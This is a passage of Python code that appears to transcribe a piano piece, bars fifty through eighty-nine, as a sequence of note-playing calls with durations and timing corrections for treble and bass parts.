self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(2)
self.sc.e5(2)
self.sc.a4(2)
self.sc.e5(2)
# -------- fifty-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(2)
self.sc.a5(2)
self.sc.g5(2)
self.sc.e5(2)
# -------- fifty-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.e7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.c7(2)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(2)
self.sc.e5(2)
self.sc.c6(2)
self.sc.e5(2)
# -------- fifty-third bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(4)
self.sc.g5(2)
self.sc.e5(2)
# -------- fifty-fourth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(2)
self.sc.e5(2)
self.sc.c6(2)
self.sc.e5(2)
# -------- fifty-fifth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(4)
self.sc.g5(2)
self.sc.e5(2)
# -------- fifty-sixth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- fifty-seventh bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- fifty-eighth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a4(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a5(1)
# -------- fifty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- sixtieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.e7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.c7(2)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a4(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a5(1)
# -------- sixty-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- sixty-second bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- sixty-third bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- sixty-fourth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- sixty-fifth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- sixty-sixth bar -------- #
# ---- major ---- #
self.sc.c6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e7(0.5)
self.sc.c7(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.modify_time(2, 1)
self.sc.a7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.b5(0.5)
self.sc.e4(0.5)
self.sc.b4(0.5)
self.sc.d5(0.5)
# -------- sixty-seventh bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- sixty-eighth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- sixty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- seventieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- seventy-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- seventy-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- seventy-third bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- seventy-fourth bar -------- #
# ---- major ---- #
self.sc.c6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e7(0.5)
self.sc.c7(6)
self.sc.modify_time(6, 1)
self.sc.e7(6)
self.sc.modify_time(6, 1)
self.sc.a7(6)
# ---- time correct ---- #
self.sc.modify_time(12, 1)
# ---- minor ---- #
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.a5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.c5(0.5)
self.sc.a4(0.5)
self.sc.a3(6)
# -------- seventy-fifth bar -------- #
# ---- major ---- #
self.sc.modify_time(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.g6s(0.5)
# ---- time correct ---- #
self.sc.modify_time(2, 1)
# ---- minor ---- #
self.sc.g3s(2)
self.sc.modify_time(2, 1)
self.sc.g4s(2)
# -------- seventy-sixth bar -------- #
# ---- major ---- #
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.b5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.g6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.b5(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
self.sc.e3(0.5)
self.sc.e4(0.5)
# -------- seventy-seventh bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.f6(0.5)
self.sc.c6(0.5)
self.sc.e6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.a4(0.5)
self.sc.f4(0.5)
self.sc.g5(0.5)
self.sc.c4(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.c5(0.5)
self.sc.g4(0.5)
self.sc.e4(0.5)
self.sc.c4(0.5)
# -------- seventy-eighth bar -------- #
# ---- major ---- #
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a5(0.5)
self.sc.d6(0.5)
self.sc.a5(0.5)
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(0.5)
self.sc.d5(0.5)
self.sc.a4(0.5)
self.sc.f4(0.5)
self.sc.d3(0.5)
self.sc.d4(0.5)
self.sc.f4(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.c4(0.5)
self.sc.a2(0.5)
self.sc.a3(0.5)
self.sc.e3(0.5)
self.sc.c4(0.5)
# -------- seventy-ninth bar -------- #
# ---- major ---- #
self.sc.d6(0.5)
self.sc.f5(0.5)
self.sc.c6(0.5)
self.sc.f5(0.5)
self.sc.b5(0.5)
self.sc.f5(0.5)
self.sc.a5(0.5)
self.sc.f5(0.5)
self.sc.f5(1)
self.sc.f5(1)
self.sc.e5(2)
self.sc.modify_time(4, 1)
self.sc.g5s(1)
self.sc.a5(1)
self.sc.b5(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.b5(1)
self.sc.b4(1)
self.sc.e3(1)
self.sc.e4(1)
self.sc.d4(1)
self.sc.c4(1)
self.sc.b3(1)
self.sc.e3(1)
self.sc.modify_time(4, 1)
self.sc.d5(1)
self.sc.c5(1)
self.sc.b4(1)
self.sc.e4(1)
# -------- eightieth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- eighty-first bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.c4(1)
self.sc.g3(1)
# -------- eighty-second bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- eighty-third bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(3)
self.sc.e5(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(1)
self.sc.b4(1)
# -------- eighty-fourth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(1)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.c7(2)
self.sc.e3(0.5)
self.sc.b3(0.5)
self.sc.c4(1)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.g6(1)
# -------- eighty-fifth bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d5(0.5)
self.sc.a5(0.5)
self.sc.d6(1)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.c7(2)
self.sc.e3(0.5)
self.sc.b3(0.5)
self.sc.e4(1)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.g6(2)
# -------- eighty-sixth bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.d5(0.5)
self.sc.a4(0.5)
self.sc.f4(0.5)
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
# -------- eighty-seventh bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(3)
self.sc.e5(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.modify_time(2, 1)
self.sc.d4(2)
self.sc.modify_time(2)
self.sc.e4(1)
self.sc.b3(1)
self.sc.g3(2)
self.sc.modify_time(4, 1)
self.sc.e5(1)
self.sc.b4(1)
self.sc.g4(2)
# -------- eighty-eighth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- eighty-ninth bar -------- #
# ---- major ---- #
